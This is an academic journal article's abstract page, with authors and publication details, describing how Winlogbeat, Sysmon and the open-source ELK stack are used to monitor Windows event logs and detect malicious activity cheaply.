Detecting and Analyzing the Malicious Windows Events using Winlogbeat and ELK Stack
J. N. Praneeth1, M. Sreedevi2
1J. N. Praneeth, M.Tech Student, Department of Computer Science and Engineering, Koneru Lakshmaiah Educational Foundation, Vaddeswaram, Guntur (Andhra Pradesh), India.
2M. Sreedevi, Professor, Department of Computer Science and Engineering, Koneru Lakshmaiah Educational Foundation, Vaddeswaram, Guntur (Andhra Pradesh), India.
Manuscript received on 25 March 2019 | Revised Manuscript received on 06 April 2019 | Manuscript Published on 18 April 2019 | PP: 716-720 | Volume-7 Issue-6S March 2019 | Retrieval Number: F03400376S19/2019©BEIESP
Open Access | Editorial and Publishing Policies | Cite | Mendeley | Indexing and Abstracting
© The Authors. Blue Eyes Intelligence Engineering and Sciences Publication (BEIESP). This is an open access article under the CC-BY-NC-ND license (http://creativecommons.org/licenses/by-nc-nd/4.0/)
Abstract: Nowadays most of the IT companies and organizations using windows operating systems are being compromised by cyber-attacks and intrusions affecting confidentiality, integrity or availability. Due to this, the job of security analysts become more complicated to analyze and detect the malicious windows event logs. So, log monitoring has to be provided in a sophisticated way so as to withstand the cyber-attacks. The biggest challenge for the IT companies is to maintain log monitoring and analysis platform in a cost-effective way. There are certain tools that have commercial editions and can costs high. For the companies who want to utilize in a cost-effective way, the open-source ELK stack can be useful for maintaining log monitoring and analyzing. The ELK stack is used which is an open source software for log monitoring, Sysmon tool is also used to identify the malicious activities on a Windows operating system. We are using Winlogbeat, a lightweight log shipper to ship windows event logs to ELK Stack. This log analysis is useful in monitoring and detecting any malicious windows events. The same process can also be used for building small SOC services.
Keywords: ELK Stack, Winlogbeat, Sysmon, Malware Detection, Log Monitoring.
Scope of the Article: Monitoring and Management